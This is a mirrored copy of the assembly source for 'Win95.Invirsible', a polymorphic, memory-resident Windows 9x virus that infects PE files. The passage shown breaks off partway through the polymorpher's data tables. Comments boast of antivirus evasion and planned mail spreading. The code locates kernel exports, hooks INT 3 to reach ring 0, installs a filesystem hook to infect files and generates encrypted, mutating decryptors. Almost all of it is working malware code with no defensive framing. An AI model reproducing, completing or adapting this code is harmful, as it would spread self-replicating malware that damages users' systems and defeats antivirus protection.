mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-04 01:15:27 +00:00
4174 lines
94 KiB
NASM
4174 lines
94 KiB
NASM
; Win95.Invirsible
|
||
; Bhunji
|
||
;
|
||
; proudly presents ;)
|
||
;
|
||
; Invirsible
|
||
;
|
||
; Virusinfo
|
||
; Version 2
|
||
; Size: Big, usually around 7.6k
|
||
; Infects: PE files
|
||
; Resident: Yes
|
||
; Systems; Win9x
|
||
; Polymorhic: Yes
|
||
|
||
; This is the second version on Invirsible. My goal with this virus
|
||
; is to make it as hard as possible to detect. It has one technique
|
||
; never seen in a virus before which I call the Guide technique. More
|
||
; info about this can be found at www.shadowvx.org. It carries a very
|
||
; advanced generic polymorpher. It is able to polymorph mov, add, sub
|
||
; so far but its trivial to add more instructions. The engine uses
|
||
; emulation to generate code. It is able to emulate memory and registers
|
||
; which results in code that looks very real. Coding new code to be
|
||
; polymorphed is pretty easy as it's similar to Intel asm.
|
||
|
||
; ex. mov RX1,[RX2]
|
||
; mov Random register 1, [Random register 2]
|
||
|
||
; Changes since last version
|
||
; A total rewrite of the polymorphic code. Works way better now.
|
||
; * Changed the polymorphic language to be more similar to Intel asm
|
||
; * Added memory emulation, the created code uses the end of .data segment.
|
||
; * Deleted advanced register emulation, did hardly create better code
|
||
; and was taking up lots of space.
|
||
; * Very generic, adding a new instruction needs 10 lines of data/code
|
||
; instead of 200-400 lines.
|
||
; * An optimiser that deletes the very worst code. (fx. mov eax,eax)
|
||
; * The linked list polymorpher will create a six different looking
|
||
; decryptors for the generic polymorpher.
|
||
|
||
|
||
; Some changes to the virus
|
||
; * Bugfixes. (Doesn't crash on infection :) )
|
||
; * Search for slackspace in .data segment. This space is used by the
|
||
; generated code to look more like real code.
|
||
; * Recompilation of the code before every infection to make the pointers
|
||
; point to the .data slack
|
||
|
||
; Things to be added in the future.
|
||
; * More instructions will be added to the polymorpher
|
||
; * A more powerful optimiser
|
||
; * Infect on NT too.
|
||
; * Spreading by mail
|
||
; * Infection of hlp files
|
||
; * EPO
|
||
; * Deregister the most common AV software on file but register it later in
|
||
; memory. This will not happen if the AV gives the virus its proper name.
|
||
; * A better method of upgrading the virus ala babylonia.
|
||
|
||
; And here is an example of what code the engine is able and has been
|
||
; able to generate.
|
||
|
||
; Version 1
|
||
; Version one is able to emulate/generate
|
||
; add, mov
|
||
s
|
||
; (code is taken from a generated Guide)
|
||
|
||
; mov ecx, 0Ch
|
||
; mov ebx, fs:[ecx] ; get random number
|
||
; mov edx, 0
|
||
; add edx, eax
|
||
; add eax, esi
|
||
; mov edi, 0
|
||
; add edi, 6472DAADh
|
||
; mov eax, 5A97451Fh
|
||
; mov eax, edx
|
||
; add edi, ecx
|
||
; mov ecx, 0
|
||
; add ecx, ebx
|
||
; or ecx, 8
|
||
; xor ebx, ecx ; 'and' ebx,8
|
||
; add edi, 0DCA7B4AAh
|
||
; add edi, 60E4CB5Ch
|
||
; mov edi, ebx
|
||
; add ebx, offset jumptable ; add ebx, offset jumptable
|
||
; jmp dword ptr [ebx]
|
||
|
||
|
||
; patterns
|
||
|
||
; Differences from the trash code
|
||
; fs:[register]
|
||
; or/and register,8
|
||
; jmp [register]
|
||
|
||
; The trashcode
|
||
; very few instructions
|
||
; no memory instructions
|
||
; the same amount of every emulateable instruction (normal code has more
|
||
; movs then adds for example)
|
||
; unnecessary instructions. Ex.
|
||
; mov eax, 5A97451Fh ; this is unnessesary
|
||
; mov eax, edx ; as this overwrites eax again
|
||
|
||
|
||
; Version 2
|
||
; Version two is able to emulate
|
||
; add, sub, mov, and, or, xor and memory
|
||
|
||
; Generates on average more movs then the
|
||
; adds and more adds then the other opcodes.
|
||
; Generates more registers then memory operands and
|
||
; more memory operands then numbers.
|
||
; The end result 'feels' more like regular code.
|
||
; Many many bugfixes. (There are no more bugs i hope)
|
||
|
||
; Code is taken from a generated decryptor
|
||
;
|
||
; mov edx, 8D403766h
|
||
; xor [4030D7], 1A45h ; 1a45 = virussize
|
||
; xor esi, [4030CF]
|
||
; mov [4030CF], ecx
|
||
; mov esi, 45BBA054h
|
||
; add edi, 0CCFC6B5Bh
|
||
; mov ebx, 1A45h ; first "real" instruction
|
||
; mov eax, [4030CF]
|
||
; sub edi, 1A45h
|
||
; or eax, ebx
|
||
; mov edi, 1A45h
|
||
; mov edi, 3
|
||
; add ecx, 3
|
||
; mov edx, [4030BF] ; second
|
||
; add [4030D7], eax
|
||
; mov esi, 3
|
||
|
||
; DecryptLoop:
|
||
; pusha ; will be deleted in future versions
|
||
; mov eax, 1FF5893Dh
|
||
; mov ecx, ebx
|
||
; sub eax, 0E138ABECh
|
||
; add edx, ecx ; third
|
||
; mov esi, ecx
|
||
; mov edi, ebx
|
||
; mov eax, 0D6E7BEF5h
|
||
; mov [4030CF], 5493B89Ch
|
||
; sub ecx, [4030B3]
|
||
; mov eax, 0E138ABECh
|
||
; and [4030D3], ecx
|
||
; or eax, ebx
|
||
; xor [edx], 0E138ABECh ; decrypt code
|
||
; mov [4030D7], 0E138ABECh
|
||
; popa
|
||
; sub ebx, 4 ;
|
||
; jnb DecryptLoop
|
||
; mov dword_0_4030CF, 69472C81h
|
||
; mov ecx, 0F5D970C4h
|
||
; mov edi, 1
|
||
; mov eax, dword_0_4030B7
|
||
; add ecx, 8244076Eh
|
||
|
||
|
||
|
||
|
||
; If we put the real code pieces together we get.
|
||
;
|
||
; mov ebx, 1A45h ; VirusSize
|
||
; mov edx, [4030BF] ; Where to start decrypt
|
||
; DecryptLoop:
|
||
; add edx, ecx ; third
|
||
; xor dword ptr [edx], 0E138ABECh ; decrypt code
|
||
; sub ebx, 4 ;
|
||
; jnb DecryptLoop
|
||
|
||
; The third instruction should add "Where to start" with "VirusSize" but
|
||
; as you can see it is added with ecx instead, this is because of the
|
||
; emulation. The engine knows that ecx = ebx = VirusSize so it used ecx
|
||
; instead.
|
||
|
||
; patterns
|
||
|
||
; Differences from the trash code
|
||
; pushad/popad ; easy to delete
|
||
; [Register] ; engine is only able to create [Number]
|
||
; jxx ; Engine isnt able to create jumps yet
|
||
|
||
; The trashcode
|
||
; Still to few instructions, needs push/pop, call, jmp, jxx to look at least
|
||
; something like real code.
|
||
; Memory instructions isn't able to create memory pointers with a register
|
||
; inside, eg [Number+register]. A better compiler will fix this.
|
||
; Still unnecessary instructions. Ex.
|
||
; mov eax, 0D6E7BEF5h ; this is unnessesary
|
||
; ...
|
||
; mov eax, 1FF5893Dh ; as this overwrites eax again
|
||
;
|
||
; Greetings
|
||
; (M)asmodeus. Dropper.exe has generated errors and will be closed by
|
||
; Windows :)))
|
||
; Morphi Hoppas att du f<>r det b<>ttre i helsingborg
|
||
; Prizzy Thanks for helping me with the bug
|
||
; Ruzz Yes, i have FINALY finished it :)
|
||
; Kamaileon. I wish you luck with the windows programming.
|
||
; Clau Hello sister ;)
|
||
; Urgo32 Good luck with your next virus.
|
||
|
||
|
||
|
||
|
||
includelib kernel32.lib
|
||
includelib user32.lib
|
||
include c:masmincludewindows.inc
|
||
|
||
|
||
.486
|
||
.model flat, stdcall
|
||
|
||
ExitProcess PROTO ,:DWORD
|
||
MessageBoxA PROTO ,:DWORD,:DWORD,:DWORD,:DWORD
|
||
|
||
|
||
; Primes, used them in the first version for advanced register emulation,
|
||
; might be usefull in the future
|
||
|
||
Prime1 equ 2
|
||
Prime2 equ 3
|
||
Prime3 equ 5
|
||
Prime4 equ 7
|
||
Prime5 equ 11
|
||
Prime6 equ 13
|
||
Prime7 equ 17
|
||
Prime8 equ 19
|
||
Prime9 equ 23
|
||
Prime10 equ 29
|
||
Prime11 equ 31
|
||
Prime12 equ 37
|
||
Prime13 equ 41
|
||
Prime14 equ 43
|
||
Prime15 equ 47
|
||
Prime16 equ 53
|
||
Prime17 equ 59
|
||
Prime18 equ 61
|
||
Prime19 equ 67
|
||
Prime20 equ 71
|
||
Prime21 equ 73
|
||
Prime22 equ 77
|
||
|
||
|
||
.data
|
||
VirusStr db "No crack found",0
|
||
|
||
.code
|
||
ProgramMain:
|
||
|
||
push 0
|
||
call ExitProcess
|
||
|
||
_rsrc segment para public 'DATA' use32
|
||
assume cs:_rsrc
|
||
|
||
|
||
VirusStart:
|
||
Main:
|
||
mov ebx,[esp]
|
||
|
||
push ebp
|
||
call GetDelta
|
||
|
||
GetDelta:
|
||
pop ebp
|
||
sub ebp,offset GetDelta ; address
|
||
|
||
mov [Temp+ebp],ebx ; save offset into kernel
|
||
|
||
.if ebp!=0 ; code that isn't
|
||
; executed in the first
|
||
; version
|
||
|
||
mov eax,[eax] ; polymorphic code will
|
||
mov [InfectedProgramOffset+ebp],eax ; move pointer to
|
||
.endif ; programstart in eax
|
||
|
||
lea eax,BreakPoint1
|
||
lea eax,[ebp+GetDelta] ; move some address to
|
||
mov [PointerToDataSlack+ebp],eax ; PTDS, doesnt matter as
|
||
; long as its a working one
|
||
|
||
; mov eax,fs:[0c]
|
||
db 67h,64h,0a1h,0ch,00h ; get random number
|
||
add [RandomNumber+ebp],eax ; (is not random on NT)
|
||
|
||
call GetAPIFunctions ; Get needed API functions
|
||
|
||
call FixTables ; clean the 'dirty' tables
|
||
; and allocate mem for the
|
||
; polymorpher
|
||
|
||
call CreateGuideAndDecryptor ; Generate the polymorphic
|
||
; code
|
||
|
||
call GetResident ; intercept IFSMgr to get
|
||
; filenames to infect
|
||
|
||
|
||
ReturnToHost:
|
||
|
||
push [MemPtr+ebp] ; free allocated mem used
|
||
call [LocalFree+ebp] ; by polymorpher
|
||
|
||
mov eax,[InfectedProgramOffset+ebp] ; program address
|
||
pop ebp ; restore ebp
|
||
|
||
jmp eax ; jmp to program
|
||
|
||
Topic db "You can not find what you can not see.",0
|
||
db "Invirsible by Bhunji (Shadow VX)",0
|
||
|
||
VSize equ VirusEnd-VirusStart
|
||
VirusSize equ VSize
|
||
|
||
|
||
|
||
; how much stack and mem should the polymorpher use
|
||
|
||
NumberOfOffsets equ 10 ; more size = better code
|
||
; (doesnt matter right now
|
||
; because the engine isnt
|
||
; able to create jumps)
|
||
StackSize equ 100 ; (doesnt matter right now
|
||
; because the engine isnt
|
||
; able to emulate the stack)
|
||
|
||
MemorySize equ 10 ; The more size the better
|
||
; code is produced but makes
|
||
; it harder to find a file to
|
||
; infect
|
||
|
||
|
||
LinesOfTrash equ 3 ; LinesOfTrash is the
|
||
; aproximate numbers of
|
||
; random instructions between
|
||
; every "legal" instruction
|
||
|
||
; LinesOfTrash
|
||
; Fixup instruction
|
||
; LinesOfTrash
|
||
|
||
EndValueFrecuency equ 1 ; the higher the more often
|
||
; is the EndValue chosed
|
||
; the higher the number is
|
||
; the harder is it to detect
|
||
; my looking at one
|
||
; instruction, but its easier
|
||
; to detect by looking at many
|
||
; instructions.
|
||
; 1 is a perfect value
|
||
|
||
MemPtr dd 0 ; ptr to allocated mem
|
||
ReturnAddress dd 0 ; stores the return address
|
||
; in some functions
|
||
|
||
|
||
InfectedProgramOffset dd ProgramMain ; where to jump when
|
||
; done
|
||
|
||
Temp dd 0 ; just a temporary variable
|
||
|
||
; API's the virus uses
|
||
WinFunctions:
|
||
lstrlenStr db "lstrlen",0
|
||
LocalAllocStr db "LocalAlloc",0
|
||
LocalFreeStr db "LocalFree",0
|
||
db 0
|
||
; pointers to these
|
||
Functions:
|
||
lstrlen dd ?
|
||
AllocMem dd ?
|
||
LocalFree dd ?
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
FixTables:
|
||
|
||
|
||
|
||
|
||
lea edi,[ZeroRegStart+ebp]
|
||
mov ecx,(ZeroRegEnd-ZeroRegStart)/4
|
||
xor eax,eax
|
||
rep stosd
|
||
|
||
lea edi,[RandomRegs+ebp]
|
||
mov ecx,Registers
|
||
dec eax
|
||
rep stosd
|
||
|
||
lea edi,[SavedOffsets+ebp]
|
||
mov ecx,NumberOfOffsets
|
||
rep stosd
|
||
|
||
|
||
lea eax,[EaxTable+ebp]
|
||
mov [Tables+ebp],eax
|
||
|
||
mov eax,MemorySize*20+StackSize*20
|
||
|
||
push eax
|
||
push LMEM_FIXED + LMEM_ZEROINIT
|
||
call [AllocMem+ebp]
|
||
mov [Tables+ebp+4],eax
|
||
|
||
add eax,MemorySize*20
|
||
mov [Tables+ebp+8],eax
|
||
|
||
|
||
call UndefineRegistersAndMem
|
||
|
||
xor eax,eax
|
||
lea esi,[Mem1Table+ebp]
|
||
mov edi,[Tables+ebp+4]
|
||
lodsb
|
||
|
||
|
||
mov ecx,eax
|
||
PredefinedMem:
|
||
lodsb
|
||
push edi
|
||
imul eax,eax,20
|
||
lea edi,[edi+eax]
|
||
push ecx
|
||
mov ecx,5
|
||
rep movsd
|
||
pop ecx
|
||
pop edi
|
||
loop PredefinedMem
|
||
|
||
ret
|
||
|
||
|
||
|
||
|
||
|
||
UndefineRegistersAndMem:
|
||
lea edi,[EaxTable+ebp+4*4]
|
||
mov ecx,Registers
|
||
mov eax,Writeable+Undefined
|
||
|
||
SetOpcodeInfo1:
|
||
stosd
|
||
add edi,4*4
|
||
loop SetOpcodeInfo1
|
||
|
||
|
||
mov edi,[Tables+ebp+4]
|
||
add edi,4*4
|
||
mov ecx,MemorySize+StackSize
|
||
mov eax,Writeable+Undefined
|
||
|
||
SetOpcodeInfo2:
|
||
stosd
|
||
add edi,4*4
|
||
loop SetOpcodeInfo2
|
||
|
||
|
||
|
||
ret
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
GetModuleHandle dd 0
|
||
GetProcAddress dd 0
|
||
GetProcAddressStr db "GetProcAddress",0
|
||
|
||
GetAPIFunctions:
|
||
mov eax,[Temp+ebp]
|
||
|
||
call GetModuleHandleAndProcAddress
|
||
|
||
mov [GetModuleHandle+ebp],eax
|
||
mov [GetProcAddress+ebp],ebx
|
||
|
||
xor edx,edx
|
||
lea edx,[WinFunctions+ebp]
|
||
xor ecx,ecx
|
||
|
||
CopyWinApiFunctions:
|
||
push edx
|
||
push ecx
|
||
|
||
push edx
|
||
push edx
|
||
push [GetModuleHandle+ebp]
|
||
call [GetProcAddress+ebp]
|
||
|
||
mov ecx,[esp+4]
|
||
mov [Functions+ebp+ecx],eax
|
||
|
||
call [lstrlen+ebp]
|
||
pop ecx
|
||
pop edx
|
||
add edx,eax
|
||
add ecx,4
|
||
inc edx
|
||
|
||
cmp byte ptr [edx],0
|
||
jnz CopyWinApiFunctions
|
||
NoMoreApis:
|
||
ret
|
||
|
||
; Input
|
||
; eax = somewhere in kernel
|
||
|
||
; Returns
|
||
; eax = GetModuleHandler offset
|
||
; ebx = GetProcAddress offset
|
||
|
||
GetModuleHandleAndProcAddress:
|
||
and eax,0fffff000h ; even 1000h something
|
||
|
||
FindKernelEntry:
|
||
sub eax,1000h
|
||
cmp word ptr [eax],'ZM'
|
||
jnz FindKernelEntry
|
||
|
||
|
||
mov ebx,[eax+3ch]
|
||
|
||
cmp word ptr [ebx+eax], 'EP'
|
||
jne FindKernelEntry
|
||
mov ebx,[eax+120+ebx]
|
||
add ebx,eax ; ebx -> Export table
|
||
|
||
mov ecx,[ebx+12] ; ecx -> dll name
|
||
|
||
cmp dword ptr [ecx+eax],'NREK'
|
||
jz FindGetProcAddress
|
||
jmp FindKernelEntry
|
||
|
||
|
||
; We can now be sure that eax points to the kernel
|
||
FindGetProcAddress:
|
||
lea edi,[GetProcAddressStr+ebp]
|
||
|
||
mov edx,[ebx+32]
|
||
|
||
FindFunction:
|
||
add edx,4
|
||
mov ecx,15 ; length of GetProcAddress,0
|
||
mov esi,[edx+eax]
|
||
push edi
|
||
add esi,eax
|
||
repz cmpsb
|
||
pop edi
|
||
jne FindFunction
|
||
|
||
sub edx,[ebx+32]
|
||
shr edx,1 ; ecx = ordinal pointer
|
||
|
||
lea esi,[edx+eax]
|
||
xor ecx,ecx
|
||
add esi,[ebx+36] ; esi = base+ordinals+ordnr
|
||
|
||
mov cx,word ptr [esi] ; ecx = ordinal
|
||
shl ecx,2 ; ecx = ordinal*4
|
||
add ecx,[ebx+28] ; ecx = ordinal*4+func tbl addr
|
||
|
||
mov ebx,[ecx+eax] ; esi = function addr in file
|
||
add ebx,eax ; esi = function addr in mem
|
||
|
||
ret
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
Encryptor dd 0
|
||
|
||
GetResident:
|
||
mov eax,[GetModuleHandle+ebp]
|
||
add eax,6ch
|
||
mov ebx,'.K3Y'
|
||
cmp [eax],ebx
|
||
|
||
jz DontGoRing0
|
||
|
||
sub esp,8
|
||
sidt [esp] ; get interupt table
|
||
|
||
|
||
; hook int 3 to get get ring 0
|
||
mov esi,[esp+2]
|
||
add esi, 3*8 ; pointer to int 3
|
||
mov ebx, [esi+4]
|
||
|
||
mov bx,word ptr [esi] ; ebx = old pointer
|
||
lea eax,[Ring0Code+ebp] ; eax = new pointer
|
||
mov word ptr [esi],ax ; move new pointer to int 3
|
||
shr eax,16
|
||
mov word ptr [esi+6], ax
|
||
|
||
pushad
|
||
|
||
int 3 ; get into ring 0
|
||
popad
|
||
mov [esi],bx ; return old pointer again
|
||
shr ebx,16
|
||
mov [esi+6],bx
|
||
add esp,8
|
||
|
||
DontGoRing0:
|
||
ret
|
||
|
||
|
||
|
||
|
||
; ---------------------------------------
|
||
; -------------------------------- Ring 0
|
||
; ---------------------------------------
|
||
|
||
|
||
Ring0Code:
|
||
mov eax,[GetModuleHandle+ebp]
|
||
add eax,6ch
|
||
mov ebx,'.K3Y'
|
||
mov [eax],ebx
|
||
mov ebx,[eax+8]
|
||
mov [eax+4],ebx
|
||
|
||
mov eax,[MemoryTable+ebp]
|
||
sub eax,[GuidePos+ebp]
|
||
push eax
|
||
|
||
add eax,(MemorySize+1)*8
|
||
push eax ; push guide + decrypt size
|
||
; + special variables
|
||
add eax,(VirusEnd-VirusStart)*2+20
|
||
|
||
; allocate mem
|
||
push eax
|
||
push R0_AllocMem
|
||
mov edi,ebp
|
||
call vxd
|
||
pop ecx
|
||
test eax,eax
|
||
jz ErrorRing0
|
||
|
||
; Copy guide and decryptor to ring 0 mem
|
||
|
||
pop ecx ; ecx = guide + decrypt size
|
||
; + special variables
|
||
mov esi,[GuidePos+ebp]
|
||
mov edi,eax
|
||
mov ebx,eax
|
||
xchg ebx,[GuidePos+ebp] ; eax = new guide pos
|
||
; ebx = old guide pos
|
||
pop edx ; edx = size of guide+decrypt
|
||
add edx,eax ; edx = new memory pos
|
||
mov [MemoryTable+ebp],edx
|
||
|
||
sub eax,ebx ; difference in mem
|
||
add [DecryptorPos+ebp],eax ; add to get new pos
|
||
|
||
|
||
|
||
|
||
rep movsb ; copy polycode to ring 0
|
||
|
||
mov edi,edx
|
||
mov ecx,(MemorySize+1)*(8/4)
|
||
xor eax,eax
|
||
rep stosd
|
||
|
||
add edx,MemorySize*4+4
|
||
mov [VirtualDataSegment+ebp],edx
|
||
|
||
pushad
|
||
|
||
|
||
mov eax,[VirtualDataSegment+ebp] ; pointer to virtual data
|
||
; segment
|
||
|
||
lea edx,[Mem1Table+ebp]
|
||
movzx ecx,byte ptr [edx] ; how much data does the
|
||
; decryptor and guide need
|
||
; predefined
|
||
inc edx
|
||
|
||
CopyDataToVirtualDataSegment:
|
||
movzx ebx,byte ptr [edx] ; where in datasegment should
|
||
; we write the data
|
||
shl ebx,2
|
||
push dword ptr [edx+1] ; push the data to write
|
||
pop [eax+ebx] ; write it to virtual data seg
|
||
add edx,1+5*4 ; point to next data block
|
||
loop CopyDataToVirtualDataSegment
|
||
|
||
popad
|
||
|
||
mov [VirusInRing0Mem+ebp],edi
|
||
mov ebx,edi
|
||
|
||
lea esi, [ebp+VirusStart]
|
||
mov ecx, VirusSize
|
||
rep movsb ; copy virus to ring 0
|
||
xor eax,eax
|
||
|
||
stosd
|
||
stosd
|
||
|
||
; encrypt virus in memory
|
||
pushad
|
||
mov esi,[Encryptor+ebp]
|
||
push ebx ; pointer to virus in ring0
|
||
mov eax,esp
|
||
push eax ; pointer to pointer
|
||
push eax
|
||
push eax
|
||
push eax
|
||
mov [PointerToDataSlack+ebp],esp ; all special variables
|
||
; points to pointer to
|
||
; virus in ring 0
|
||
call Compile
|
||
|
||
call esi
|
||
|
||
add esp,5*4
|
||
|
||
popad
|
||
|
||
; copy residentcode to mem
|
||
push edi
|
||
|
||
lea esi, [ebp+ResidentcodeStart]
|
||
mov ecx, ResidentcodeEnd-ResidentcodeStart
|
||
rep movsb
|
||
|
||
|
||
|
||
|
||
|
||
; hook API function
|
||
; edi is on stack
|
||
push InstallFileSystemAPIhook
|
||
mov edi,ebp
|
||
call vxd
|
||
|
||
|
||
pop edi ; 0 edi left on stack
|
||
sub edi,ResidentcodeStart
|
||
mov [edi+BasePtr+1],edi
|
||
mov [edi+OldAPIFunction],eax
|
||
BreakPoint1:
|
||
|
||
lea eax,[edi+BreakPoint]
|
||
lea eax,[edi+BreakPoint]
|
||
iretd
|
||
|
||
ErrorRing0:
|
||
pop eax
|
||
xor eax,eax
|
||
iretd
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
CreateGuideAndDecryptor:
|
||
push 1024*1024
|
||
push LMEM_FIXED + LMEM_ZEROINIT
|
||
call [AllocMem+ebp]
|
||
|
||
mov [MemPtr+ebp],eax
|
||
|
||
|
||
|
||
|
||
|
||
|
||
mov edi,eax
|
||
lea esi,[Guide+ebp]
|
||
|
||
call LinkedListPolymorpher
|
||
call Polymorph ; create Guide
|
||
|
||
mov [GuidePos+ebp],esi
|
||
mov [GuideSize+ebp],eax
|
||
|
||
add edi,32
|
||
|
||
lea esi,[Decryptor+ebp]
|
||
|
||
call LinkedListPolymorpher
|
||
push esi
|
||
|
||
call Polymorph ; create Decryptor
|
||
|
||
mov [DecryptorPos+ebp],esi
|
||
mov [MemoryTable+ebp],edi
|
||
|
||
mov [DecryptorSize+ebp],eax
|
||
|
||
|
||
call UndefineRegistersAndMem
|
||
|
||
mov [HowMuchTrash+ebp],0
|
||
pop esi
|
||
|
||
pushad
|
||
mov edi,esi
|
||
mov eax,Op_trash
|
||
bswap eax
|
||
xor ecx,ecx
|
||
xor edx,edx
|
||
FindTrashInstruction:
|
||
inc edi
|
||
cmp [edi],edx
|
||
jz EndOfTrashInstructions
|
||
xor ecx,ecx
|
||
cmp [edi],eax
|
||
jnz FindTrashInstruction
|
||
add edi,4
|
||
push eax
|
||
xor eax,eax
|
||
stosb
|
||
pop eax
|
||
jmp FindTrashInstruction
|
||
|
||
EndOfTrashInstructions:
|
||
test ecx,ecx
|
||
jnz ReallyEnd
|
||
inc ecx
|
||
add edi,3
|
||
jmp FindTrashInstruction
|
||
|
||
ReallyEnd:
|
||
popad
|
||
add edi,eax
|
||
call MutateCode ; Generic polymorphing
|
||
|
||
mov ecx,edi
|
||
sub ecx,esi
|
||
shr ecx,1
|
||
mov edi,esi
|
||
|
||
FindDecryptInstruction:
|
||
mov eax,'R['
|
||
repnz scasw ; find [R
|
||
inc edi
|
||
mov ax,word ptr [edi]
|
||
cmp eax,',]' ; is this [Rx],
|
||
jnz FindDecryptInstruction ; if not, continue looking
|
||
|
||
and edi,0fffffff0h
|
||
mov eax,[edi]
|
||
bswap eax
|
||
|
||
.if eax==Op_xor
|
||
jmp CompileEncryptor
|
||
|
||
.elseif eax==Op_add
|
||
mov eax,Op_sub
|
||
bswap eax
|
||
stosd
|
||
jmp CompileEncryptor
|
||
.else
|
||
mov eax,Op_add
|
||
bswap eax
|
||
stosd
|
||
jmp CompileEncryptor
|
||
.endif
|
||
|
||
|
||
CompileEncryptor:
|
||
mov [Encryptor+ebp],esi
|
||
|
||
|
||
|
||
|
||
|
||
ret
|
||
|
||
|
||
|
||
|
||
; ---------------------------------------------------
|
||
; --------------------------- The generic polymorpher
|
||
; ---------------------------------------------------
|
||
|
||
; esi = Data to polymorph
|
||
; edi = where to put the created data
|
||
|
||
; Returns
|
||
; esi = start of created data
|
||
; edi = end of created data/start of created code
|
||
; eax = size of the created code
|
||
|
||
; Defined opcode looks
|
||
Op_add equ 'add '
|
||
Op_and equ 'and '
|
||
Op_mov equ 'mov '
|
||
Op_or equ 'or '
|
||
Op_sub equ 'sub '
|
||
Op_xor equ 'xor '
|
||
|
||
|
||
Op_cmp equ 'cmp '
|
||
Op_jnz equ 'jnz '
|
||
Op_jnb equ 'jnb '
|
||
Op_jna equ 'jna '
|
||
Op_jmp equ 'jmp '
|
||
|
||
Op_offset equ 'ofs '
|
||
Op_db equ 'db ' ; output whats in there,
|
||
; dont polymorph,
|
||
; dont compile
|
||
|
||
Op_dontparse equ '!emu' ; dont polymorph only
|
||
; compile
|
||
|
||
|
||
; special opcodes
|
||
Op_encrypt equ 'cpt ' ; encrypt this operand,
|
||
; used to create encryptor/
|
||
; decryptor
|
||
|
||
Op_setinfo equ 'nfo ' ; set info of operand
|
||
; used to define a operand
|
||
; changable or similar.
|
||
Op_prefix equ 'pfx ' ; prefix, eg fs:, es: and
|
||
; similar. Will be deleted
|
||
; in future versions
|
||
|
||
Op_trash equ 'trsh' ; how mush trash to be
|
||
; produced, use wisely
|
||
; to make your code better
|
||
; or when you need to save
|
||
; the flags
|
||
|
||
|
||
|
||
|
||
|
||
LinkedListPolymorpher:
|
||
call TablePolymorpher ; 'old' style polymorphics
|
||
|
||
; esi -> created data
|
||
; edi -> created data+sizeof (created data)+1
|
||
ret
|
||
|
||
Polymorph:
|
||
add edi,16
|
||
and edi,0fffffff0h
|
||
push edi
|
||
push edi
|
||
|
||
call MutateCode ; Generic polymorphing
|
||
pop edi
|
||
; esi -> created data
|
||
call Optimize ; Optimize the created code
|
||
|
||
; esi -> created data
|
||
; edi -> created data+sizeof (created data)+1
|
||
push edi
|
||
|
||
call Compile ; compile the code to get
|
||
; the size
|
||
|
||
pop edi
|
||
pop esi
|
||
ret
|
||
|
||
|
||
|
||
|
||
Regs equ 6
|
||
Registers equ Regs
|
||
InfoPtr equ 16
|
||
|
||
|
||
|
||
|
||
|
||
; This polymorher is a bit different from the usuall one.
|
||
; It's able to create code that does different things, not just
|
||
; the same with a different look.
|
||
|
||
|
||
|
||
|
||
TablePolymorpher:
|
||
; A nice recursive function :)
|
||
xor eax,eax
|
||
xor ecx,ecx
|
||
push edi
|
||
push 0
|
||
ReadInstruction: ; 'execute' function
|
||
mov cl, byte ptr [esi] ; How many bytes to output
|
||
inc esi
|
||
rep movsb
|
||
|
||
ParseCall: ; end of this function,
|
||
; should we call an other
|
||
lodsb
|
||
test eax,eax
|
||
jz ReturnFromCall ; no, return
|
||
|
||
|
||
lea ebx,[esi+eax*4]
|
||
push ebx ; push return address
|
||
|
||
call Random
|
||
mov esi,[esi+eax*4] ; address of the function
|
||
add esi,ebp
|
||
jmp ReadInstruction ; jmp to function 'executer'
|
||
|
||
ReturnFromCall:
|
||
pop esi ; return from main function
|
||
test esi,esi
|
||
jnz ParseCall
|
||
|
||
NoMoreParsing:
|
||
xor eax,eax
|
||
stosd
|
||
stosd
|
||
|
||
pop esi
|
||
ret
|
||
|
||
Decryptor:
|
||
db 0
|
||
|
||
db 1
|
||
dd R0VSize
|
||
; dd R0Zero
|
||
|
||
db 1
|
||
dd MovePoinerToProgramStart
|
||
|
||
|
||
|
||
db 0
|
||
|
||
MovePoinerToProgramStart:
|
||
db MovePoinerToProgramStartEnd-$-1
|
||
db "trsh",LinesOfTrash
|
||
|
||
db "mov R1,[N"
|
||
dd 1
|
||
db "]"
|
||
|
||
MovePoinerToProgramStartEnd:
|
||
db 0
|
||
|
||
|
||
R0VSize:
|
||
db R0VSizeEnd-$-1
|
||
db "mov RX0,N"
|
||
dd VSize
|
||
R0VSizeEnd:
|
||
|
||
db 2
|
||
dd R1VirusStart
|
||
dd R1VirusEnd
|
||
|
||
db 1
|
||
dd EncryptRX1
|
||
|
||
db 1
|
||
dd SubR0AndJump
|
||
db 0
|
||
|
||
SubR0AndJump:
|
||
db SubR0AndJumpEnd-$-1
|
||
db "db ",1 ; Bytes not to be morphed
|
||
popad
|
||
|
||
db "trsh",0
|
||
db "sub RX0,N"
|
||
dd 4
|
||
|
||
db "!emu",9 ; dont do anything about this
|
||
db "jnb N"
|
||
dd 0
|
||
SubR0AndJumpEnd:
|
||
db 0
|
||
|
||
R0Zero:
|
||
db R0ZeroEnd-$-1
|
||
db "mov RX0,N"
|
||
dd 0
|
||
R0ZeroEnd:
|
||
|
||
db 2
|
||
dd R1VirusStart
|
||
dd R1VirusEnd
|
||
|
||
db 1
|
||
dd EncryptRX1
|
||
|
||
db 1
|
||
dd AddR0AndJump
|
||
db 0
|
||
|
||
|
||
AddR0AndJump:
|
||
db AddR0AndJumpEnd-$-1
|
||
|
||
db "db ",1 ; Bytes not to be morphed
|
||
popad
|
||
|
||
db "add RX0,N"
|
||
dd 4
|
||
|
||
db "trsh",0
|
||
db "!emu",13 ; dont do anything about this
|
||
db "cmp RX0,N"
|
||
dd VSize
|
||
|
||
db "!emu",9 ; dont do anything about this
|
||
db "jna N"
|
||
dd 0
|
||
|
||
AddR0AndJumpEnd:
|
||
|
||
db 0
|
||
|
||
|
||
|
||
R1VirusStart:
|
||
db R1VirusStartEnd-$-1
|
||
db "mov RX1,[N"
|
||
dd 3
|
||
db "]"
|
||
|
||
db "ofs 0"
|
||
|
||
db "db ",1
|
||
pushad
|
||
|
||
db "nfo RX2"
|
||
dd Undefined
|
||
|
||
db "add RX1,RX0"
|
||
|
||
